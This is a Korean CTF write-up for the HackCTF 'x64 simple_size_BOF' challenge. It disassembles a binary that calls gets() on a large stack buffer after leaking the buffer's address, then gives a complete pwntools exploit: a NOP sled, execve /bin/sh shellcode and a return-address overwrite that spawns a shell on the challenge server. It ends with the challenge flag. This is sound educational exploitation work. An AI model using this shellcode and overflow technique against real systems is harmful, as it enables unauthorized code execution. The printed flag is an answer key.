WriteUp/HackCTF
[HackCTF] x64 simple_size_BOF
d2n0s4ur
2021. 8. 8. 14:29
main을 덤프뜬 코드
Dump of assembler code for function main:
0x0000000000400636 <+0>: push rbp
0x0000000000400637 <+1>: mov rbp,rsp
0x000000000040063a <+4>: sub rsp,0x6d30
0x0000000000400641 <+11>: mov rax,QWORD PTR [rip+0x200a08] # 0x601050 <stdout@@GLIBC_2.2.5>
0x0000000000400648 <+18>: mov ecx,0x0
0x000000000040064d <+23>: mov edx,0x2
0x0000000000400652 <+28>: mov esi,0x0
0x0000000000400657 <+33>: mov rdi,rax
0x000000000040065a <+36>: call 0x400520 <setvbuf@plt>
0x000000000040065f <+41>: mov edi,0x400728
0x0000000000400664 <+46>: call 0x4004e0 <puts@plt>
0x0000000000400669 <+51>: lea rax,[rbp-0x6d30]
0x0000000000400670 <+58>: mov rsi,rax
0x0000000000400673 <+61>: mov edi,0x40074e
0x0000000000400678 <+66>: mov eax,0x0
0x000000000040067d <+71>: call 0x4004f0 <printf@plt>
0x0000000000400682 <+76>: lea rax,[rbp-0x6d30]
0x0000000000400689 <+83>: mov rdi,rax
0x000000000040068c <+86>: mov eax,0x0
0x0000000000400691 <+91>: call 0x400510 <gets@plt>
0x0000000000400696 <+96>: mov eax,0x0
0x000000000040069b <+101>: leave
0x000000000040069c <+102>: ret
End of assembler dump.
이를 hexray해보면
#include<stdio.h>
int main()
{
char s[0x6D30]
setvbuf(stdout, 0, 2, 0);
puts("삐빅- 자살방지 문제입니다.");
printf("buf: %p\n", s);
gets(s);
return 0;
}
다음과 같다. 마찬가지로 gets에서 오버플로우가 발생한다.
그 전에 s가 어디에 있는지 위치를 알려주기 때문에, buf에 shellcode를 넣어놓고 overflow를 일으키면 될 것 같다.
from pwn import *
# p = process('./Simple_size_bof')
p = remote("ctf.j0n9hyun.xyz",3005)
p.recvuntil("buf: ")
a = p.recvline()[:-1]
a = int(a, 16)
print(hex(a))
payload = ''
payload += '\x90' * 0x30
payload += '\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\xb0\x3b\x0f\x05'
payload += '\x90' * (0x6d30 - 0x30 - 31)
payload += 'A' * 8
payload += p64(a)
p.sendline(payload)
p.interactive()
성공적으로 shell이 따이는 것을 확인할 수 있다.
FLAG : HackCTF{s000000_5m4ll_4nd_5m4ll_51z3_b0f}
반응형